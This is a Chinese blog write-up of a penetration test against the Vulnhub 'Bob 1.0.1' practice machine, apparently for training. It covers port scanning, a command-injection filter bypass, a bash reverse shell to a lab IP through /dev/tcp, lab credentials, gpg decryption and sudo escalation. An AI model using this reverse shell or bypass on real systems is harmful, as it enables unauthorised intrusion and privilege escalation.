Vulnhub Bob 1.0.1靶机(渗透测试详解)

一、配置靶机

1、配置靶机网卡

2、kali扫描靶机IP

nmap 192.168.31.0/24

3、扫描靶机开启的端口及服务

nmap -sV -p- -A -Pn 192.168.31.146

4、进行靶机目录扫描

dirsearch -u http://192.168.31.146

二、web渗透测试

1、访问靶机IP地址

2、查找页面功能点

在点击到contact US时,发现了好多用户邮箱和手机号,经过发现,bob可能是管理员用户

3、拼接访问扫描的路径

拼接passwords.html

是一段留言,没有什么信息

拼接/robots.txt

发现了新的路径

继续拼接访问

拼接/dev_shell.php

发现是个命令执行漏洞,但是部分命令被禁用了

尝试用管道符或者是特殊符号绕过过滤。这里通过管道符'|'列出当前目录下的文件

4、尝试反弹shell

id & echo "bash -i >& /dev/tcp/192.168.31.128/5555 0>&1" | bash

成功反弹

三、提权

1、查看是否有权限文件

没有可利用的

2、查看home家目录有啥

切换到家目录,发现有四个用户,分别对应Contact Us页面中IT部门的四个工作人员

先看bob的家目录里面有什么

查看这个password文件

<html> <p> jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M3 </p> </html>

直接告诉了jc和seb的密码

查看这俩用户的目录

jc

seb

elliot

这儿发现了一个txt文件,查看

也没搞懂啥意思,但是信中的内容提到了bob,所以再次进入bob的家目录看一下
Documents这个路径下发现了三个文件

分别查看其内容

staff.txt

没啥子用

login.txt.gpg

需要密钥才能查看

还有一个Secret的文件夹,随着这个文件往下面找

发现个sh可执行文件,查看

没看懂,网上查资料发现这个密钥就是藏头诗,所以密钥就为HARPOCRATES

然后回到那个gpg文件所在的目录,进行解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

提示好像是权限不够

3、ssh连接jc用户

ssh jc@192.168.233.133 -p 25468
密码:Qwerty
注意ssh端口是25468

切换到那个gpg,再次进行解密

成功获得bob密码

4、切换到bob用户

利用sudo -l查看权限

发现ALL有用用户都可以,直接sudo su提权

提权成功!!!!

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值